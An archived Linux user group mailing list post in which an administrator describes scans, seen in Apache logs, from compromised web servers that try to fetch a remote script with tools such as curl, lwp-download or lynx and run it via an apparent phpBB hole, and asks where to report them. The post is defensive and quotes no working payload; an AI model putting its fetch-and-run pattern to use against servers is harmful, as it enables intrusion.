Mailing List Archive


[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[tlug] Dealing with webapp security scans



Hi,

Recently I have observed that my server are being scanned for security
breaches.
From Apache's log[1], I saw that most of the HTTP requests which
connections originate from compromised web servers.

The scanners scan for security breaches all over the Internet. When if
finds a hole to be in, it try to get a script ( for example,
advguestbook//img/verid.txt  - see [1], scroll down ) from a remote
host with one of the tools available on the system ( curl,
libwww-perl's GET or lwp-download, fetch, lynx --sources ) and execute
it. On my server, it looks like that they are scanning for a PHPBB's
security hole.

Question: How to deal with those compromised web servers? They are
hacked and being used as 踏み台. Should I report them? If so, where to to
report?

[1] http://aoclife.ddo.jp/~vuhung/tmp/tlug/grep.libwww-perl.httpd.access.log.txt

-- 
Best Regards,
Nguyen Hung Vu ( Nguyễn Vũ Hưng )
vuhung16plus{remove}@example.com
An inquisitive look at Harajuku
http://www.flickr.com/photos/vuhung/sets/72157600109218238/

Home | Main Index | Thread Index

Home Page Mailing List Linux and Japan TLUG Members Links